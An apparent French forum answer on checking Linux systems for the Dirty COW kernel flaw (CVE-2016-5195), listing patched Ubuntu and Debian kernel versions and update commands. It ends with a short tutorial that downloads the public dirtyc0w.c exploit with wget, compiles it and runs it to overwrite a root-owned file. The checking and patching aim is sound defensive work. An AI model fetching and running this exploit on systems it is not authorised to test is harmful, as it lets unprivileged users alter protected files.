Vous pouvez faire uname -rv
pour connaître votre version du noyau Linux. Vous obtiendrez une sortie similaire à ci-dessous :
4.4.0-42-generic #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016
Si votre version est antérieure à la suivante, vous êtes concerné :
-
4.8.0-26.28 pour Ubuntu 16.10
-
4.4.0-45.66 pour Ubuntu 16.04 LTS
-
3.13.0-100.147 pour Ubuntu 14.04 LTS
-
3.2.0-113.155 pour Ubuntu 12.04 LTS
-
3.16.36-1+deb8u2 pour Debian 8
-
3.2.82-1 pour Debian 7
-
4.7.8-1 pour Debian instable
Selon security-tracker.debian, vous devez exécuter uname -a
et vérifiez votre version actuelle du noyau .
wheezy 3.2.78-1 vulnerable
wheezy (security) 3.2.82-1 fixed
jessie 3.16.36-1+deb8u1 vulnerable
jessie (security) 3.16.36-1+deb8u2 fixed
stretch, sid 4.7.8-1 fixed
Cette vulnérabilité est corrigée sous debian , en mettant à jour votre système :
apt-get update
apt-get upgrade
apt-get dist-upgrade
Modifier
Comment m'assurer que mon système d'exploitation n'est pas affecté par CVE-2016-5195 ?
Vous pouvez essayer le tutoriel suivant.
Téléchargez l'exploit.
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
En tant que root :Créer le foo
fichier :
su
echo this is not a test > foo
En tant qu'utilisateur :
gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
Vérifiez votre fichier :
cat foo
Sur une machine vulnérable, vous obtiendrez m00000000000000000
en sortie.